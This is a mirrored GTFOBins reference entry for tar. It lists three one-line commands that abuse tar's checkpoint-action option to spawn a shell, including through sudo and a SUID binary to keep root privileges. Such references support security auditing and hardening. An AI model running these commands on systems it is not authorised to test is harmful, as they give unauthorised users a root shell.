This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-10 09:21:34 +01:00
Code
Issues
158291baa4
GTFOBins.github.io
/
_gtfobins
/
tar.md
Emilio Pinna
158291baa4
Add missing descriptions
2018-05-22 21:22:20 +01:00
346 B
Raw
Blame
History
functions
exec-interactive
sudo-enabled
suid-limited
code
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
code
./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"